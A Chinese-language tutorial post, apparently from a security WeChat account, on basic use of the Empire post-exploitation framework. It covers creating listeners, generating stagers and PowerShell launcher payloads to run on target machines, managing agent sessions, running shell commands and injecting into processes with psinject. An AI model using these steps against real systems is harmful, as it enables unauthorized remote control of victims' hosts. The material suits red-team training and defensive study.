【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)

admin 2021年7月26日10:00:50评论107 views字数 1144阅读3分48秒阅读模式

一、基本命令:(##注意Empire下命令区分大小写##)

1、启动Empire后,首先查看一下命令帮助信息

help

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)




二、设置监听器

与coblatstrike类似,也是要先创建Linstener,然后后续操作选择生成的监听器即可,与CS不同的是:当开启多个监听时,必须使用不同的名称、不同的端口


1、进入listeners界面:

listeners

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


查看命令帮助

help

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)



2、创建Listener:

uselistener命令,可以通过空格+双击tab键,看到一共有7种Listener,一般常用的是:http、http_foreign、meterpreter、redirector,其他的不怎么用

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


创建Listener:

①选择监听器类型

uselistener <监听器类型>

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


②查看所需配置

info

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


③设置相关配置并启动监听

set Name <自定义名称>set Host <服务器ip>set Port <监听端口>execute    #执行监听器

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


back返回listeners界面即可看到监听器列表

list

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


④删除监听器

kill <监听器名称>




三、生成木马stagers:

在listeners界面下操作,通过usestager,空格+双击tab键可以看到支持的所有stagers,


multi是通用模块、osx是mac操作系统、然后就是windows的模块

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


①生成stager:

usestager <模块名称>set listener <监听器名称>execute    #执行生成

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


然后会在/tmp/目录下生成木马文件,在目标主机运行就会上线

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)



②使用launcher命令:

launcher <语言> <监听器名称>

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


将生成的这段payload在有powershell的目标机上执行,就会上线



③操作agents(会话):

1.查看会话列表:

agents    #相当于msf的sessions命令

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


重命名agents:

rename <会话名称> <新的名称>

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


2.进入会话:

interact <会话名称>

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


back命令就可以实现将会话放置后台了



3.杀死会话:

kill <会话名称>  先执行remove <会话名称>   再执行

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)



4.agents具体命令操作:

很多命令和MSF的meterpreter会话操作差不多

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


常用命令:

help agentcmds

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


执行cmd命令:

shell +命令

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)



四、进程注入:

ps    #查看进程PID

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


注入进程:

usemodule management/psinjectset ProcIdset Listener <监听器名称>execute

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)


注入成功会返回一个新的agent会话



点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

点个赞和在看吧,欢迎转发!

【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)



本文始发于微信公众号(哈拉少安全小队):【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月26日10:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【Empire系列】02 基本操作(Listener、stager、常用命令、进程注入)https://cn-sec.com/archives/436431.html

发表评论

匿名网友 填写信息